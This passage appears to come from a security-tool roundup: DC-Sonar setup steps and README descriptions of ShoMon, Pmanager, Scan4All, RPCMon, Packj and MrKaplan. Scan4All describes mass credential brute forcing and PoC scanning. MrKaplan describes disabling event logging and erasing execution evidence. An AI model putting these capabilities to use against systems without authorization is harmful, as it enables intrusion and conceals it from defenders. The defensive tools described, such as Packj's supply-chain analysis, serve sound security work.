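    print(cur.fetchone()[0])
conn.close()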

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open the management UI at http://localhost:15672/.
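
To verify the admin account and the management plugin from the Windows host without a browser, a standard-library-only sketch against the management HTTP API (through the forwarded port 15672) could look like this:

import base64
import json
import urllib.request

req = urllib.request.Request("http://127.0.0.1:15672/api/overview")
token = base64.b64encode(b"admin:{YOUR_PASSWORD}").decode()  # credentials created above
req.add_header("Authorization", f"Basic {token}")
with urllib.request.urlopen(req) as resp:
    overview = json.load(resp)
print(overview["rabbitmq_version"])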

Install Python3.10

Ensure that your system is up to date:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then add the deadsnakes PPA to the APT sources list:

sudo add-apt-repository ppa:deadsnakes/ppa

Install Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the installed Python version:

python3.10 --version

Output:
Python 3.10.5

Hosts

Add the IP addresses of the Domain Controllers to /etc/hosts:

sudo nano /etc/hosts

Layers

Set venv

We have to create the venv one level above, since VirtualBox does not allow creating it inside shared folders.

Go to the home directory where the shared folders are located:

cd /home/user

Make deploy steps for dc-sonar-user-layer on Ubuntu.

Make deploy steps for dc-sonar-workers-layer on Ubuntu.

Make deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Make config steps for dc-sonar-user-layer on Ubuntu.

Make config steps for dc-sonar-workers-layer on Ubuntu.

Make config steps for ntlm-scrutinizer on Ubuntu.

Run

Make run steps for ntlm-scrutinizer on Ubuntu.

Make run steps for dc-sonar-user-layer on Ubuntu.

Make run steps for dc-sonar-workers-layer on Ubuntu.

Make run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and accept the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and log in as the Django user created earlier.



Shomon - Shodan Monitoring Integration For TheHive


ShoMon is a Shodan alert feeder for TheHive written in GoLang. With version 2.0, it is more powerful than ever!


Functionalities

  • Can be used as a webhook OR stream listener

    • The webhook listener opens a RESTful API endpoint for Shodan to send alerts to. This means the endpoint must be reachable from the public internet
    • The stream listener connects to Shodan and fetches/parses the alert stream
  • Utilizes shadowscatcher/shodan (fantastic work) for Shodan interaction.

  • Console logs are in JSON format and can be ingested by log management tools

  • CI/CD via GitHub Actions ensures that a proper release with changelogs, artifacts, and images on ghcr and DockerHub is provided

  • Provides a working docker-compose file for TheHive and its dependencies

  • Very fast and very small in size

  • A complete code refactoring in v2.0 resulted in more modular, maintainable code

  • Alert specifics, including tags, type, and alert template, can be adjusted dynamically via the conf file or environment variables. See the config file.

  • The full banner can be included in the alert, with a direct link to the Shodan finding.

  • The IP is added to the observables

Usage

  • Parameters should be provided via conf.yaml or environment variables. Please see the config file and the docker-compose file

  • After the conf file or environment variables are set, simply run:

    ./shomon

Notes

  • The alert reference is the first 6 characters of md5("ip:port") (a minimal sketch follows)
  • Only one mode can be active at a time; the webhook and stream listeners cannot be enabled together.
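
As an illustration of the reference scheme described in the first note (ShoMon itself is written in Go; this Python sketch only reproduces the scheme, and the IP/port pair is made up):

import hashlib

def alert_reference(ip: str, port: int) -> str:
    # first 6 hex characters of md5("ip:port")
    return hashlib.md5(f"{ip}:{port}".encode()).hexdigest()[:6]

print(alert_reference("198.51.100.7", 443))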

Setup & Compile Instructions

Get latest compiled binary from releases

  1. Check Releases section.

Compile from source code

  1. Make sure that you have a working Golang workspace.
  2. go build .
    • go build -ldflags="-s -w" . could be used to customize compilation and produce a smaller binary.

Using Public Container Registries

  1. Thanks to the new CI/CD integration, the latest built images are pushed to ghcr and DockerHub and can be pulled via:
    • docker pull ghcr.io/kaansk/shomon
    • docker pull kaansk/shomon

Using Dockerfile

  1. Edit the config file or provide environment variables to the commands below
  2. docker build -t shomon .
  3. docker run -it shomon

Using docker-compose file

  1. Edit the environment variables and configuration in the docker-compose file
  2. docker-compose up -d

Credits



Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Have Leaked Previously To Prevent Targeted Password Reuse Attacks


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords have been leaked previously to prevent targeted password-reuse attacks.


Why develop another password manager ?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state-of-the-art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation, to make brute-force attacks harder for an attacker.
    • AES-256-GCM for database encryption.
  • Custom encrypted key-value database which ensures data integrity. (Read the blog post I wrote about it here.)
  • Easy to install and use. Does not require a connection to an external service for its core functionality.
  • Check whether your passwords have been leaked before, to avoid targeted password-reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 hexadecimal characters to XposedOrNot (a minimal sketch follows).
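
A minimal Python sketch of that prefix computation, assuming the pycryptodome package is available (keccak-512 is not the same as SHA3-512, so hashlib alone is not enough); the actual XposedOrNot endpoint and response handling are omitted here:

from Crypto.Hash import keccak

def leak_check_prefix(password: str) -> str:
    h = keccak.new(digest_bits=512)
    h.update(password.encode())
    return h.hexdigest()[:10]  # only this prefix would leave your machine

print(leak_check_prefix("hunter2"))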

Installation

Pmanager depends on the "pkg-config" and "libssl-dev" packages on Ubuntu. Simply install them with:

sudo apt install pkg-config libssl-dev -y

Download the binary for your OS from releases, add its location to the PATH environment variable, and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system, but you should be able to build it from source ("cargo build --release"), since there is no OS-specific functionality.

Documentation

First, the database needs to be initialized using the "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database has been leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexadecimal characters to xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...


  • What is scan4all: an integration of vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent. A red-team tool with code-level optimization and parameter tuning; individual modules of the integrated projects, such as vscan's filefuzz, have been rewritten. In principle, the wheel is not reinvented unless there are bugs or problems
  • Cross-platform: implemented in golang, lightweight, highly customizable, open source; supports Linux, Windows, macOS, etc.
  • Supports password brute forcing for 21 kinds of services, with custom dictionaries, enabled by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detects MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148) and SmbGhost (CVE-2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, intelligent HTTP password brute forcing is enabled; it activates automatically when HTTP authentication is required, with no manual intervention
  • Detects whether nmap is present on the system; priorityNmap=true (the default) enables nmap for fast scanning, with optimized nmap parameters that are faster than masscan. Disadvantages of using nmap: on a poor network, the large traffic volume may lead to incomplete results. Using nmap additionally requires setting the root password in an environment variable:

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh. By default, naabu is used for port scanning; use -stats=true to view the scanning progress. Can I skip port scanning?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapResult.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG        COUNT   AUTHOR         COUNT   DIRECTORY         COUNT   SEVERITY   COUNT   TYPE      COUNT
cve        1294    daffainfo      605     cves              1277    info       1352    http      3554
panel      591     dhiyaneshdk    503     exposed-panels    600     high       938     file      76
lfi        486     pikpikcu       321     vulnerabilities   493     medium     766     network   50
xss        439     pdteam         269     technologies      266     critical   436     dns       17
wordpress  401     geeknik        187     exposures         254     low        211
exposure   355     dwisiswant0    169     misconfiguration  207     unknown    7
cve2021    322     0x_akoko       154     token-spray       206
rce        313     princechaddha  147     workflows         187
wp-plugin  297     pussycat0x     128     default-logins    101
tech       282     gy741          126     file              76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis automatically correlates domain names found in SSL information (such as *.xxx.com) and, according to the configuration, completes subdomain traversal; results are automatically added to the scan list
    • Subdomain traversal for *.xx.com found in smart SSL information can be enabled with export EnableSubfinder=true, or adjusted in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, port scans are merged to improve efficiency
      2. Intelligently handles abnormal HTTP pages, with fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version fixes the issue of target information being passed to the DNS Log Server, avoiding exposure of vulnerabilities
    • Added the ability to send results to Elasticsearch in batches
    • A golang version may be implemented in the future. How to use:
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identifies honeypots and skips those targets. This function is disabled by default; set EnableHoneyportDetection=true to enable it

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • Supports HTTP request smuggling: CL-TE, TE-CL, TE-TE, CL_CL, BaseErr


  • Supports passing a cookie via Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com; compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, and HTTP smuggling

work process


how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

    1. Start Elasticsearch (of course, you can use a traditional way to output results instead)
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD/config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 192.168.0.111 is the target to query
  • Please install nmap yourself before use. Usage help:
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to add HTTP smuggling and cache-poisoning detection
  • Integrate with metasploit-framework (assuming it is installed on the system), working together with tmux, with the macOS environment as the best-practice linkage
  • Integrate more fuzzers, such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify the fingerprint name to configure it

Q & A

  • How to use a Cookie?
  • libpcap-related questions

For more, see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301: bug with concurrent multi-instance runs
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 added DCOM protocol enumeration of network interfaces
  • 2022-06-30 embedded a private build of nuclei-templates (3744 YAML POCs in total); 1. integrated Elasticsearch storage of intermediate results 2. embedded the whole config directory into the program
  • 2022-06-27 improved fuzzy matching for better accuracy and robustness; progress on ksubdomain integration
  • 2022-06-24 optimized the fingerprint algorithm; added a workflow diagram
  • 2022-06-23 added the ParseSSl parameter: by default, DNS information in SSL certificates is not deeply analyzed or scanned; fixed a bug where .exe was not automatically appended for nmap; fixed a bug where cache files were not size-optimized on Windows
  • 2022-06-22 integrated weak-password detection and brute forcing for 11 protocols: ftp, mongodb, mssql, mysql, oracle, postgresql, rdp, redis, smb, ssh, telnet; also improved support for external password dictionaries
  • 2022-06-20 integrated Subfinder for domain brute forcing, enabled via export EnableSubfinder=true (note: startup is slow once enabled); automatic deep drilling of domain information in SSL certificates; custom dictionaries and related switches can be defined via config/config.json
  • 2022-06-17 improved handling of one domain with multiple IPs: all IPs are port-scanned and then follow the subsequent scanning process
  • 2022-06-15 this version adds several weblogic password dictionaries and webshell dictionaries obtained from past engagements
  • 2022-06-10 completed the nuclei integration, including of course the nuclei templates
  • 2022-06-07 added a similarity algorithm to detect 404 pages
  • 2022-06-07 added a parameter for precise scanning of HTTP URL lists, enabled via the environment variable UrlPrecise=true


RPCMon - RPC Monitor Tool Based On Event Tracing For Windows

A GUI tool for scanning RPC communication through Event Tracing for Windows (ETW). The tool was published as part of research on RPC communication between the host and a Windows container.

Overview

RPCMon can help researchers get a high-level view of RPC communication between processes. It was built like Procmon for easy usage, and uses James Forshaw's .NET library for RPC. RPCMon can show you the RPC functions being called, the process that called them, and other relevant information.
RPCMon uses a hardcoded RPC dictionary, containing information about RPC modules, for fast RPC information processing. It also has an option to build an RPC database from your computer in case some details are missing from the hardcoded RPC dictionary.

Usage

Double-click the EXE binary and you will get the GUI window.
RPCMon needs a DB to be able to get the details of the RPC functions; without a DB, some information will be missing.
To load the DB, press DB -> Load DB... and choose your DB. You can use a DB we added to this project: /DB/RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json.

Features

  • A detailed overview of RPC functions activity.
  • Build an RPC database to parse RPC modules, or use the hardcoded database.
  • Filter/highlight rows based on cells.
  • Bold specific rows.

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get the RPC functions.

License

Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References:

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages


Packj (pronounced package) is a command line (CLI) tool to vet open-source software packages for "risky" attributes that make them vulnerable to supply chain attacks. This is the tool behind our large-scale security analysis platform Packj.dev that continuously vets packages and provides free reports.


How to use

Packj accepts two input args:

  • name of the registry or package manager, pypi, npm, or rubygems.
  • name of the package to be vetted

Packj supports vetting of PyPI, NPM, and RubyGems packages. It performs static code analysis and checks for several metadata attributes such as release timestamps, author email, downloads, dependencies. Packages with expired email domains, large release time gap, sensitive APIs, etc. are flagged as risky for security reasons.

Packj also analyzes public repo code as well as metadata (e.g., stars, forks). By comparing the repo description and the package title, you can check whether the package was indeed created from that repo, mitigating starjacking attacks.
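
As an illustration (not Packj's actual code), one such metadata check, the age of the latest release, can be reproduced against the public PyPI JSON API:

import json
import urllib.request
from datetime import datetime, timezone

def latest_release_age_days(package: str) -> int:
    # public PyPI metadata endpoint
    with urllib.request.urlopen(f"https://pypi.org/pypi/{package}/json") as resp:
        meta = json.load(resp)
    version = meta["info"]["version"]
    uploaded = meta["releases"][version][0]["upload_time_iso_8601"]
    ts = datetime.fromisoformat(uploaded.replace("Z", "+00:00"))
    return (datetime.now(timezone.utc) - ts).days

print(latest_release_age_days("requests"))  # compare: "Checking version...ALERT [... days old]"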

Containerized

The best way to use Packj is to run it inside a Docker (or Podman) container. You can pull our latest image from DockerHub to get started.

docker pull ossillate/packj:latest

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest npm browserify
[+] Fetching 'browserify' from npm...OK [ver 17.0.0]
[+] Checking version...ALERT [598 days old]
[+] Checking release history...OK [484 version(s)]
[+] Checking release time gap...OK [68 days since last release]
[+] Checking author...OK [mail@substack.net]
[+] Checking email/domain validity...ALERT [expired author email domain]
[+] Checking readme...OK [26838 bytes]
[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]
[+] Checking downloads...OK [2.2M weekly]
[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]
[+] Checking repo data...OK [stars: 14077, forks: 1236]
[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [48 found]
[+] Downloading package 'browserify' (ver 17.0.0) from npm...OK [163.83 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]
[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]
=============================================
[+] 5 risk(s) found, package is undesirable!
=> Complete report: /tmp/npm-browserify-17.0.0.json
{
"undesirable": [
"old package: 598 days old",
"invalid or no author email: expired author email domain",
"generates new code at runtime",
"reads files and dirs",
"forks or exits OS processes",
]
}

Specific package versions to be vetted can be specified using ==. Please refer to the example below:

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest pypi requests==2.18.4
[+] Fetching 'requests' from pypi...OK [ver 2.18.4]
[+] Checking version...ALERT [1750 days old]
[+] Checking release history...OK [142 version(s)]
[+] Checking release time gap...OK [14 days since last release]
[+] Checking author...OK [me@kennethreitz.org]
[+] Checking email/domain validity...OK [me@kennethreitz.org]
[+] Checking readme...OK [49006 bytes]
[+] Checking homepage...OK [http://python-requests.org]
[+] Checking downloads...OK [50M weekly]
[+] Checking repo_url URL...OK [https://github.com/psf/requests]
[+] Checking repo data...OK [stars: 47547, forks: 8758]
[+] Checking repo activity...OK [commits: 6112, contributors: 725, tags: 144]
[+] Checking for CVEs...ALERT [2 found]
[+] Checking dependencies...OK [9 direct]
[+] Downloading package 'requests' (ver 2.18.4) from pypi...OK [123.27 KB]
[+] Analyzing code...ALERT [needs 4 perms: codegen,process,file,network]
[+] Checking files/funcs...OK [47 files (33 .py), 578 funcs, LoC: 13.9K]
=============================================
[+] 6 risk(s) found, package is undesirable, vulnerable!
{
"undesirable": [
"old package: 1744 days old",
"invalid or no homepage: insecure webpage",
"generates new code at runtime",
"fetches data over the network",
"reads files and dirs",
],
"vulnerable": [
"contains CVE-2018-18074,CVE-2018-18074"
]
}
=> Complete report: /tmp/pypi-requests-2.18.4.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/requests/2.18.4

Non-containerized

Alternatively, you can install Python/Ruby dependencies locally and test it.

NOTE

  • Packj has only been tested on Linux.
  • Requires Python3 and Ruby. API analysis will fail if used with Python2.
  • You will have to install Python and Ruby dependencies before using the tool:
    • pip install -r requirements.txt
    • gem install google-protobuf:3.21.2 rubocop:1.31.1
$ python3 main.py npm eslint
[+] Fetching 'eslint' from npm...OK [ver 8.16.0]
[+] Checking version...OK [10 days old]
[+] Checking release history...OK [305 version(s)]
[+] Checking release time gap...OK [15 days since last release]
[+] Checking author...OK [nicholas+npm@nczconsulting.com]
[+] Checking email/domain validity...OK [nicholas+npm@nczconsulting.com]
[+] Checking readme...OK [18234 bytes]
[+] Checking homepage...OK [https://eslint.org]
[+] Checking downloads...OK [23.8M weekly]
[+] Checking repo_url URL...OK [https://github.com/eslint/eslint]
[+] Checking repo data...OK [stars: 20669, forks: 3689]
[+] Checking repo activity...OK [commits: 8447, contributors: 1013, tags: 302]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [35 found]
[+] Downloading package 'eslint' (ver 8.16.0) from npm...OK [490.14 KB]
[+] Analyzing code...ALERT [needs 2 perms: codegen,file]
[+] Checking files/funcs...OK [395 files (390 .js), 1022 funcs, LoC: 76.3K]
=============================================
[+] 2 risk(s) found, package is undesirable!
{
"undesirable": [
"generates new code at runtime",
"reads files and dirs: ['package/lib/cli-engine/load-rules.js:37', 'package/lib/cli-engine/file-enumerator.js:142']"
]
}
=> Complete report: /tmp/npm-eslint-8.16.0.json

How it works

  • It first downloads the metadata from the registry using their APIs and analyzes it for "risky" attributes.
  • To perform API analysis, the package is downloaded from the registry using their APIs into a temp dir. Then, packj performs static code analysis to detect API usage. API analysis is based on MalOSS, a research project from our group at Georgia Tech.
  • Vulnerabilities (CVEs) are checked by pulling info from the OSV database (a minimal query sketch follows this list)
  • Python PyPI and NPM package downloads are fetched from pypistats and npmjs
  • All detected risks are aggregated and reported
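
The osv.dev v1 API is public, so the CVE lookup step can be sketched as follows (again, not Packj's actual code); the package/version pair mirrors the requests example above:

import json
import urllib.request

query = {
    "version": "2.18.4",
    "package": {"name": "requests", "ecosystem": "PyPI"},
}
req = urllib.request.Request(
    "https://api.osv.dev/v1/query",
    data=json.dumps(query).encode(),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as resp:
    vulns = json.load(resp).get("vulns", [])
print([v["id"] for v in vulns])  # CVE/GHSA identifiers, if any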

Risky attributes

The design of Packj is guided by our study of 651 malware samples of documented open-source software supply chain attacks. Specifically, we have empirically identified a number of risky code and metadata attributes that make a package vulnerable to supply chain attacks.

For instance, we flag inactive or unmaintained packages that no longer receive security fixes. Inspired by Android app runtime permissions, Packj uses a permission-based security model to offer control and code transparency to developers. Packages that invoke sensitive operating system functionality such as file accesses and remote network communication are flagged as risky as this functionality could leak sensitive data.

Some of the attributes we vet for, include

  • Release date (Metadata): version release date, to flag old or abandoned packages. Reason: old or unmaintained packages do not receive security fixes.
  • OS or lang APIs (Code): use of sensitive APIs, such as exec and eval. Reason: malware uses APIs from the operating system or language runtime to perform sensitive operations (e.g., read SSH keys).
  • Contributors' email (Metadata): email addresses of the contributors. Reason: incorrect or invalid email addresses suggest a lack of 2FA.
  • Source repo (Metadata): presence and validity of a public source repo. Reason: the absence of a public repo means there is no easy way to audit or review the source code publicly.

Full list of the attributes we track can be viewed at threats.csv

These attributes have been identified as risky by several other researchers [1, 2, 3] as well.

How to customize

Packj has been developed with a goal to assist developers in identifying and reviewing potential supply chain risks in packages.

However, since the degree of perceived security risk from an untrusted package depends on the specific security requirements, Packj can be customized according to your threat model. For instance, a package with no 2FA may be perceived to pose greater security risks to some developers, compared to others who may be more willing to use such packages for the functionality offered. Given the volatile nature of the problem, providing customized and granular risk measurement is one of our goals.

Packj can be customized to minimize noise and reduce alert fatigue by simply commenting out unwanted attributes in threats.csv

Malware found

We found over 40 malicious packages on PyPI using this tool. A number of them have been taken down. Refer to an example below:

$ python3 main.py pypi krisqian
[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]
[+] Checking version...OK [256 days old]
[+] Checking release history...OK [7 version(s)]
[+] Checking release time gap...OK [1 days since last release]
[+] Checking author...OK [KrisWuQian@baidu.com]
[+] Checking email/domain validity...OK [KrisWuQian@baidu.com]
[+] Checking readme...ALERT [no readme]
[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]
[+] Checking downloads...OK [13 weekly]
[+] Checking repo_url URL...OK [None]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...OK [none found]
[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,network,file]
[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]
=============================================
[+] 6 risk(s) found, package is undesirable!
{
"undesirable": [
"no readme",
"only 45 weekly downloads",
"no source repo found",
"generates new code at runtime",
"fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",
"reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"
]
}
=> Complete report: pypi-KrisQian-0.0.7.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7

Packj flagged KrisQian (v0.0.7) as suspicious due to absence of source repo and use of sensitive APIs (network, code generation) during package installation time (in setup.py). We decided to take a deeper look, and found the package malicious. Please find our detailed analysis at https://packj.dev/malware/krisqian.

More examples of malware we found are listed at https://packj.dev/malware. Please reach out to us at oss@ossillate.com for the full list.

Resources

To learn more about Packj tool or open-source software supply chain attacks, refer to our

The vetting tool 🚀 behind our large-scale security analysis platform to detect malicious/risky open-source packages

Upcoming talks

Feature roadmap

  • Add support for other language ecosystems. Rust is a work in progress and will be available in the last week of July '22.
  • Add functionality to detect several other "risky" code and metadata attributes.
  • Packj currently performs only static code analysis; we are working on adding support for dynamic analysis (WIP, ETA: end of summer)

Team

Packj has been developed by Cybersecurity researchers at Ossillate Inc. and external collaborators to help developers mitigate risks of supply chain attacks when sourcing untrusted third-party open-source software dependencies. We thank our developers and collaborators.

We welcome code contributions. Join our discord community for discussion and feature requests.

FAQ

  • What Package Managers (Registries) are supported?

Packj can currently vet NPM, PyPI, and RubyGems packages for "risky" attributes. We are adding support for Rust.

  • Does it work on obfuscated calls? For example, a base64-encoded string that gets decoded and then passed to a shell?

This is a very common malicious behavior. Packj detects code obfuscation as well as spawning of shell commands (exec system call). For example, Packj can flag use of the getattr() and eval() APIs as they indicate "runtime code generation"; a developer can then go and take a deeper look. See main.py for details. (A minimal example of the pattern follows.)
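
For concreteness, this is the kind of pattern such static analysis flags — a harmless stand-in payload hidden behind base64 and executed via eval(); the flagged signal is the b64decode/eval API usage itself, not the decoded content:

import base64

# benign stand-in for what malware might hide (e.g. a shell command)
payload = base64.b64encode(b"__import__('os').getcwd()").decode()

# ...later, in innocent-looking code: flagged as runtime code generation
result = eval(base64.b64decode(payload))
print(result)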

  • Does this work at the system call level, where it would detect e.g. any attempt to open ~/.aws/credentials, or does it rely on heuristic analysis of the code itself, which will always be able to be "coded around" by the malware authors?

Packj currently uses static code analysis to derive permissions (e.g., file/network accesses). Therefore, it can detect open() calls if used by the malware directly (i.e., not obfuscated in a base64-encoded string). But Packj can also point out such base64 decode calls. Fortunately, malware has to use these APIs (read, open, decode, eval, etc.) for its functionality -- there's no getting around them. Having said that, sophisticated malware can hide itself better, so dynamic analysis must be performed for completeness. We are incorporating strace-based dynamic analysis (containerized) to collect system calls. See the roadmap for details.



MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution


MrKaplan is a tool aimed at helping red teamers stay hidden by clearing evidence of execution. It works by saving information such as the time it ran and snapshots of files, and by associating each piece of evidence with the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certain operations and leave artifacts for blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with the begin flag; whenever you finish, run it again with the end flag.
  • DO NOT REMOVE MrKaplan's registry key; otherwise MrKaplan will not be able to use the information.

IOCs

  • A PowerShell process that accesses the artifacts mentioned in the wiki page.

  • PowerShell importing a suspicious base64 blob.

  • A PowerShell process that performs token manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan (a minimal check sketch follows).
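
A minimal Python sketch (Windows-only, standard-library winreg) that a blue team could use to check for the registry key IOC; this is an illustration, not part of MrKaplan:

import winreg

try:
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\MrKaplan")
    winreg.CloseKey(key)
    print("IOC found: HKCU\\Software\\MrKaplan exists")
except FileNotFoundError:
    print("MrKaplan registry key not present")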

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage done to your computer or programs as a result of this project. I happily accept contributions; make a pull request and I will review it!


